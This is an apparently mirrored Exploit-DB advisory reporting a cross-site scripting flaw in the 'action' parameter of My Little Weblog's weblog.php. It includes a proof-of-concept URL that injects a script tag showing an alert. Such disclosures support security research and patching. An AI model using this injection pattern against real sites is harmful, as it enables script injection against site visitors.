exploit-db-mirror/exploits/php/webapps/29162.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

5 lines
No EOL
306 B
Text

source: http://www.securityfocus.com/bid/21238/info
My Little Weblog is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to the 'action' parameter of the 'weblog.php' script.
www.example.com/weblog.php?action="><script>alert('XSS')</script><